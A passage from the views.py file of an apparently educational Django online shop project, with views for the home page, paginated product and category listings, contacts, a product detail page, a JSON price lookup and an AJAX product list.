'title': 'Главная',\n 'main_menu': main_menu,\n 'products': products,\n\n }\n return render(request, 'mainapp/index.html', content)\n\n\ndef products(request, pk=None, page=1):\n title = 'Продукты'\n\n # links_menu = ProductCategory.objects.all()\n links_menu = ProductCategory.objects.filter(is_active=True)\n basket = get_basket(request.user)\n\n # basket = []\n # if request.user.is_authenticated:\n # basket = Basket.objects.filter(user=request.user)\n\n if pk is not None:\n if pk == 0:\n category = {\n 'pk': 0,\n 'name': 'все'\n }\n # products = Product.objects.all().order_by('price')\n products = Product.objects.filter(is_active=True, category__is_active=True).order_by('price')\n else:\n category = get_object_or_404(ProductCategory, pk=pk)\n # products = 
Product.objects.filter(category__pk=pk).order_by('price')\n products = Product.objects.filter(category__pk=pk, is_active=True, category__is_active=True).order_by(\n 'price')\n\n paginator = Paginator(products, 2)\n try:\n products_paginator = paginator.page(page)\n except PageNotAnInteger:\n products_paginator = paginator.page(1)\n except EmptyPage:\n products_paginator = paginator.page(paginator.num_pages)\n\n content = {\n 'title': title,\n 'links_menu': links_menu,\n 'main_menu': main_menu,\n 'products': products_paginator,\n 'category': category,\n }\n return render(request, 'mainapp/products_list.html', content)\n\n hot_product = get_hot_product()\n same_products = get_same_products(hot_product)\n\n # same_products = Product.objects.all()[:5]\n\n content = {\n 'title': title,\n 'links_menu': links_menu,\n 'main_menu': main_menu,\n 'same_products': same_products,\n 'hot_product': hot_product,\n }\n return render(request, 'mainapp/products.html', content)\n\n\ndef contact(request):\n content = {\n 'title': 'Контакты',\n 'main_menu': main_menu\n }\n return render(request, 'mainapp/contact.html', content)\n\n\ndef context(request):\n content = {\n 'title': 'магазин',\n 'header': 'Доброго времени суток',\n 'username': 'Ларина Е.В.',\n 'products': [\n {'name': 'Стулья', 'price': 4545},\n {'name': 'Диваны', 'price': 9545},\n {'name': 'Кровати', 'price': 9999},\n ]\n }\n\n return render(request, 'mainapp/test_context.html', content)\n\n\n@never_cache\ndef product(request, pk):\n title = 'Продукты'\n\n content = {\n 'title': title,\n 'links_menu': ProductCategory.objects.all(),\n 'product': get_object_or_404(Product, pk=pk),\n 'basket': get_basket(request.user),\n\n }\n\n return render(request, 'mainapp/product.html', content)\n\n\ndef product_price(request, pk):\n products = Product.objects.filter(pk=pk)\n\n if products:\n return JsonResponse({'price': products[0].price})\n else:\n return JsonResponse({'price': 0})\n\n\ndef products_ajax(request, pk=None, page=1):\n if request.is_ajax():\n links_menu = get_links_menu()\n print('Cработал', type(pk))\n if pk is not None:\n if pk == 0:\n category = {\n 'pk': 0,\n 'name': 'все'\n }\n print('ПК = 0')\n products = get_products_orederd_by_price()\n else:\n category = get_category(pk)\n products = get_products_in_category_orederd_by_price(pk)\n\n paginator = Paginator(products, 3)\n try:\n products_paginator = paginator.page(page)\n except PageNotAnInteger:\n products_paginator = paginator.page(1)\n except EmptyPage:\n products_paginator = paginator.page(paginator.num_pages)\n\n content = {\n 'links_menu': links_menu,\n 'category': category,\n 'products': products_paginator,\n }\n\n result = render_to_string(\n 'includes/inc_products_list_content.html',\n context=content,\n request=request)\n return JsonResponse({'result': result})\n","repo_name":"LarinAlexei/geekshop-server2","sub_path":"mainapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}